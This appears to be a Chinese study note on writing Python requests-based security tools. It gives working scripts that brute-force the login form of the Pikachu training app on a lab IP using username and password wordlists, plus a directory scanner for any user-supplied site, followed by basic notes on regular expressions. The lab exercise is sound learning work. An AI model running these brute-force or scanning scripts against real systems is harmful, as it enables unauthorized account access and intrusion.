requests模块编写漏洞检测工具

#尝试使用python登录pikachu爆破模块
#发送post数据包，包含用户名密码，对接受到的响应进行判断，如何为登录成功
#爆破密码
with open('passwor.txt','r') as f:
password=f.readlines()
for i in password:
data = {'username': 'admin', 'password': i, "submit": "Login"}
proxy = {"http": "127.0.0.1:8080", "https": "127.0.0.1:8080"}
url = "http://192.168.10.128:806/vul/burteforce/bf_form.php"
r = requests.post(url=url, data=data, proxies=proxy)
r.encoding = "utf-8"
if "login success" in r.text:
print("登录成功")
print("密码：",i)
#既爆破密码又爆破用户名
#split('\n')[0]，基于\n进行字符串拆分，并取出第一位
with open('passwor.txt','r') as f:
password=f.readlines()
with open('user.txt','r') as p:
username=p.readlines()
for j in username:
for i in password:
data = {'username': j.split('\n')[0], 'password': i.split('\n')[0],
"submit": "Login"}
proxy = {"http": "127.0.0.1:8080", "https": "127.0.0.1:8080"}
url = "http://192.168.10.128:806/vul/burteforce/bf_form.php"
r = requests.post(url=url, data=data, proxies=proxy)
r.encoding = "utf-8"
if "login success" in r.text:
print("登录成功")
print("用户名",j,"密码：", i)
break
break
#如何目录扫描
#基于requests发送数据包拼接url即可
#stat_code,200存在，403存在，404不存在
#如何目录扫描,如何将扫出来的结果汇总成一个文件，txt格式即可，扫描的网站由自己定义
inurl=input("输入要扫描的网站：\n")
resfile=inurl.split('://')[1]+'res.txt'
with open('PHP.txt','r') as f:
dic=f.readlines()
for i in dic:
url=inurl+i.split('\n')[0]
r=requests.head(url=url,proxies=proxy)
if r.status_code==200 or r.status_code==403:
with open(file=resfile,mode='a') as p:
p.write(i)
p.close()
print(i+'文件&目录存在')
else:
pass
#看dirsearch的源码

数据筛选

re 模块，正则

常用方法

match 匹配以某个规则开头的字符串

# 字符串未以 g 开头则未匹配

search 匹配字符于字符串中的任意位置

只要出现 g 就匹配

findall

和匹配所有， search 仅一次

text =
"""Ross McFluff: 834.345.1254 155 Elm Street
Ronald Heathmore: 892.345.3428 436 Finley Avenue
Frank Burger: 925.541.7625 662 South Dogwood Way
Heather Albrecht: 548.326.4584 919 Park Place
"""